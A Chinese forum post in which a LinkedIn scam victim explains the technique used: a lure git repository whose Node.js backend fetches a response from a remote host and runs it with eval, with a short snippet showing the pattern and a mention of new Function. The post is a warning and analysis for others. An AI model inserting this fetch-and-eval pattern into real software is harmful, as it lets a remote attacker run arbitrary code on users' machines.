最近在领英遭到诈骗, 我写了一篇帖子分享经历领英遭诈骗事件始末. 
这里开一个专门的帖子, 分享里面的技术细节, 有安全领域的大佬请多指教🙏. 
首先, 骗子会给你一个git仓库的链接, 里面是一整套代码, 前后端都有, 后端是nodejs. 用的技术就是js里我们平常被禁止用到的万恶之源 eval! 
贴一段示例代码 
const getCookie = async () => {
const res = await axios.get("http://${host}/${apiKey}")
eval(res.data.cookie)
}

另外还有new Funcation (咦, 为啥不能输入大写F 🤯), 一样的道理, 这里就不多做解释了. 
真正的木马程序会由远端下发, 可能是python脚本, 或者js脚本. 
不知道这种恶意代码样本应该如何分享才合规, 我先截个图, 大概是这...